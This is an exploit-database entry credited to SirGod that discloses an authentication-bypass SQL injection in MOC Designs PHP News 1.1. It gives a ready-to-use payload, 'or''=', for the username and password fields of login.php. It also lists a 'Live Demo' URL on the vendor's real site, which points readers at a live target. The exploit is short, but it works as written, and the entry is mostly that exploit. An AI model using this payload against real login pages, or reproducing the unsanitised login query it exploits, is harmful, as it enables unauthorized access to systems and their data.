id: 5611
date: 08/03/2009
title: MOC Designs PHP News 1.1 (Auth Bypass) SQL Injection Vulnerability
author: SirGod
cves: 

==================================================================
MOC Designs PHP News 1.1 (Auth Bypass) SQL Injection Vulnerability
==================================================================


#########################################################################
[+] MOC Designs PHP News v1.1 (Auth Bypass) SQL Injection Vulnerability
[+] Discovered By SirGod
#########################################################################

[+] Homepage : http://www.mocdesigns.com/

[+] SQL Injection (Auth Bypass)

 - PoC

    http://127.0.0.1/news/login.php

 User : 'or''='
 Password : 'or''='

 - Live Demo

    http://www.mocdesigns.com/news/login.php

#########################################################################



#  0day.today [2023-03-26]  #